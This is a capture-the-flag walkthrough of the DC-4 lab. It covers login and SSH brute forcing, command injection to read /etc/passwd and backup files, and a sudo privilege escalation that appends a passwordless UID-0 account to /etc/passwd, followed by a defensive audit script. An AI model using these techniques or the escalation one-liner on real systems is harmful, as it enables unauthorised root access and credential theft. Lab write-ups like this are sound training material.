The first step is to get the IP of our target machine (i.e., DC-4). The process is as follows:

Start a network scan in your Kali terminal using arp-scan or Netdiscover.

Command- arp-scan -l


In this scan we found the IP.

Now let's see what is available on this IP.


There is a login page, which we can brute-force with Burp.

As we have our target IP, we will scan its ports using Nmap.

Command- nmap


As we can see, HTTP and SSH are open.

So let's first brute-force the login page with rockyou.txt.


We found username= admin, password= happy

So let's see what is inside.


We have found commands running, but there are only 3.

So we will try more commands in Burp using Repeater.


We have found some passwords in /home/jim/backups/old-password.bak

Now, for the users, let's look in /etc/passwd.


Here we found 3 users, jim, sam and Charles, who have bash as their shell. So let's brute-force SSH with Hydra.


Now we have jim's password, i.e., jibril04.

Let's see what we get over SSH.


We got a test mail that was sent from root to jim. Since this is a test mail, let's check if there is something interesting in /var/mail.


And we got Charles's password as well, so let's switch user.

Now we need root access, so we start by listing what we can run with sudo.

Command- sudo -l


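As we can see, Charles has permission to run teehee with sudo without a password. Now, to gain root access, we append a line to /etc/passwd that defines a user raaj with an empty password field and UID 0:

Command- echo "raaj::0:0:::/bin/bash" | sudo teehee -a /etc/passwd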


And boom, here we got the flag.
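
From the defender's side, the entry appended above stands out: it has an empty password field and UID 0 on an account other than root. The following audit of passwd-format text is an added example, not part of the original walkthrough; the sample file is constructed (only the raaj line comes from the command above) and the function name audit_passwd is an assumption.

```python
"""Added example: audit passwd(5)-format text for risky account entries."""

# Constructed sample: ordinary entries plus the line appended in the walkthrough.
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
jim:x:1002:1002:Jim,,,:/home/jim:/bin/bash
raaj::0:0:::/bin/bash
"""


def audit_passwd(text):
    """Return a list of (line_number, account, finding) tuples.

    Checks performed on each entry:
      * the entry has the 7 colon-separated fields passwd(5) requires
      * the password field is not empty (empty means no password is needed)
      * UID 0 is held only by the account named root
    """
    findings = []
    for lineno, line in enumerate(text.splitlines(), start=1):
        # Skip blank lines and comments.
        if not line.strip() or line.lstrip().startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) != 7:
            findings.append((lineno, fields[0], "malformed entry (expected 7 fields)"))
            continue
        name, passwd, uid = fields[0], fields[1], fields[2]
        if passwd == "":
            findings.append((lineno, name, "empty password field"))
        if uid.isdigit() and int(uid) == 0 and name != "root":
            findings.append((lineno, name, "UID 0 on a non-root account"))
    return findings


if __name__ == "__main__":
    # On a real host, pass the contents of /etc/passwd instead of the sample.
    for lineno, name, finding in audit_passwd(SAMPLE_PASSWD):
        print(f"line {lineno}: {name}: {finding}")
```

The root cause on this box is the sudo rule that lets an unprivileged user run a file-writing program as root, so the same review should cover the sudoers configuration as well as /etc/passwd.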

